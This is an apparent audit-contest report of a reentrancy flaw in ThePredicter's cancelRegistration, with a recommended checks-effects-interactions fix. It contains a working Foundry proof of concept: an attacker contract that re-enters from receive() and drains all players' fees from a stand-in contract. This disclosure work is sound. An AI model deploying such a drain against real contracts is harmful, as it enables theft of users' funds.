Submission Details
Severity: high
Valid

Reentrancy vulnerability in `cancelRegistration`

Summary

The cancelRegistration function in the ThePredicter contract is vulnerable to reentrancy: it sends the entrance fee to msg.sender with a low-level call and only afterwards updates the player's status, so a contract recipient can re-enter the function while it is still marked Pending.

Vulnerability Details

In the cancelRegistration function:

function cancelRegistration() public {
if (playersStatus[msg.sender] == Status.Pending) {
// Interaction first: low-level call forwards all remaining gas to msg.sender,
// whose receive()/fallback can call cancelRegistration() again.
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
// Effect last: status is still Pending during any re-entrant call above.
playersStatus[msg.sender] = Status.Canceled;
return;
}
revert ThePredicter__NotEligibleForWithdraw();
}

The function makes an external call to send ETH before updating the player's status, violating the checks-effects-interactions pattern. Because `call` forwards all remaining gas, a contract at msg.sender can re-enter cancelRegistration from its receive() or fallback() function; the Pending check passes again on every re-entry until the status is finally written.

Impact

An attacker registers once from a contract, calls cancelRegistration, and re-enters it from receive() on every ETH transfer while their status is still Pending. Each re-entry pays out another entranceFee, so the attacker withdraws far more than the single fee they deposited and can drain every entrance fee held by the contract, including those of honest players.
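A Foundry proof of concept for the drain described above, added here as an illustration and not part of the original submission or the ThePredicter code base. The target is a minimal stand-in contract that copies cancelRegistration verbatim from the report; the `register()` function, the `Status` enum layout, the 0.04 ether fee and the two honest players are assumptions made so the test runs stand-alone.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

/// Minimal stand-in for the vulnerable contract (assumption: only the pieces
/// needed to exercise cancelRegistration are modelled; the real ThePredicter
/// has more state and functions than shown here).
contract VulnerablePredicter {
    enum Status { Unknown, Pending, Approved, Canceled }
    error ThePredicter__NotEligibleForWithdraw();

    uint256 public constant entranceFee = 0.04 ether; // assumed fee value
    mapping(address => Status) public playersStatus;

    /// Assumed registration path: pay exactly the fee and become Pending.
    function register() public payable {
        require(msg.value == entranceFee, "Wrong fee");
        playersStatus[msg.sender] = Status.Pending;
    }

    /// Copied from the report: interaction (ETH send) before effect (status write).
    function cancelRegistration() public {
        if (playersStatus[msg.sender] == Status.Pending) {
            (bool success, ) = msg.sender.call{value: entranceFee}("");
            require(success, "Failed to withdraw");
            playersStatus[msg.sender] = Status.Canceled;
            return;
        }
        revert ThePredicter__NotEligibleForWithdraw();
    }
}

/// Attacker contract: registers once, then re-enters cancelRegistration from
/// receive() while its status is still Pending.
contract Reenter {
    VulnerablePredicter public immutable target;

    constructor(VulnerablePredicter _target) {
        target = _target;
    }

    function attack() external payable {
        target.register{value: msg.value}();
        target.cancelRegistration();
    }

    receive() external payable {
        // Keep re-entering while the target can still pay out a full fee;
        // the status write has not happened yet, so the Pending check passes.
        if (address(target).balance >= target.entranceFee()) {
            target.cancelRegistration();
        }
    }
}

contract ReentrancyTest is Test {
    VulnerablePredicter predicter;
    uint256 fee;

    function setUp() public {
        predicter = new VulnerablePredicter();
        fee = predicter.entranceFee();
        // Two honest players fund the contract (constructed fixture).
        address alice = makeAddr("alice");
        address bob = makeAddr("bob");
        vm.deal(alice, fee);
        vm.deal(bob, fee);
        vm.prank(alice);
        predicter.register{value: fee}();
        vm.prank(bob);
        predicter.register{value: fee}();
    }

    function test_reentrancyDrainsAllFunds() public {
        Reenter attacker = new Reenter(predicter);
        vm.deal(address(this), fee);
        attacker.attack{value: fee}();

        // Attacker deposited one fee and walked away with all three.
        assertEq(address(predicter).balance, 0);
        assertEq(address(attacker).balance, 3 * fee);
    }
}
```

Run with `forge test --match-test test_reentrancyDrainsAllFunds -vvv`. The trace shows three nested cancelRegistration calls, each passing the Pending check, before the first frame finally writes Status.Canceled. Replacing the target's function body with the checks-effects-interactions version from the Recommendations makes the second call revert with ThePredicter__NotEligibleForWithdraw, which bubbles up through receive() and fails the outer `require(success)`, so the attacker gets nothing back at all.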

Tools Used

Manual code review

Recommendations

Implement the checks-effects-interactions pattern: mark the player as Canceled before sending the ETH, so any re-entrant call from the recipient hits the revert branch. A reentrancy guard such as OpenZeppelin's ReentrancyGuard can be added on top as defence in depth, but the ordering fix alone closes this issue.

function cancelRegistration() public {
// Check
require(playersStatus[msg.sender] == Status.Pending, "Not eligible");
// Effect: status is written before any external interaction,
// so a re-entrant call fails the check above.
playersStatus[msg.sender] = Status.Canceled;
// Interaction
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
}

Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Reentrancy in cancelRegistration

Reentrancy of ThePredicter::cancelRegistration allows a malicious user to drain all funds.
